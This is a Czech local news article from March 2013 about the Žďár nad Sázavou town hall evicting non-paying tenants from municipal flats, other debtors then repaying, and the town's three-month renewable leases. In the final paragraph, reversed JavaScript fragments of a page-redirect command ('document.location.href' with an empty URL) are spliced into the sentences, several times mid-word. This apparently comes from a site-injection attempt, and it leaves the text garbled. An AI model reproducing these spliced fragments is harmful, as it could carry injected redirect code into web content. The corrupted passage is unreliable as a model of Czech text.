Žďár nad Sázavou, zdar nad sazavou, aktuality, neplatiči, dluhy
Rainbow page separator

Neplatiči začali splácet svoje dluhy

Čtvrtek, 7. března 2013

Žďár nad Sázavou / K poslednímu kroku – vystěhování neplatících nájemníků z městských bytů – byla okolnostmi přinucena žďárská radnice v minulém měsíci. Jednalo se zatím o dva případy vyklizení bytu. „V průběhu měsíce pak přicházeli na úřad další dlužníci a spláceli svoje závazky. V některých případech tak byla výpověď z bytu města vzata zpět,“ vyjádřila se žďárská starostka Dagmar Zvěřinová.

Podle jejích slov mělo první vystěhování na ostatní neplatiče psychologický dopad ve smyslu, že donekonečna jim radnice jejich narůstající dluhy trpět nebude a že mohou skončit podobně.

Radnice ve Žďáře s obyvateli městských bytů s ohledem na ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to možné problémy neuzavírá dlouhodobější nájemní smlouvy. Na základě zkušeností z předchozích let jde o smlouvu na dobu urči[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na tři měsíce. V případě, že nájemník plní všechny svoje povinnosti vůči městu řádně a včas, smlouva mu je prodloužena na stejně dlouhou dobu, pokud se se zástupci Žďáru nedohodne jinak.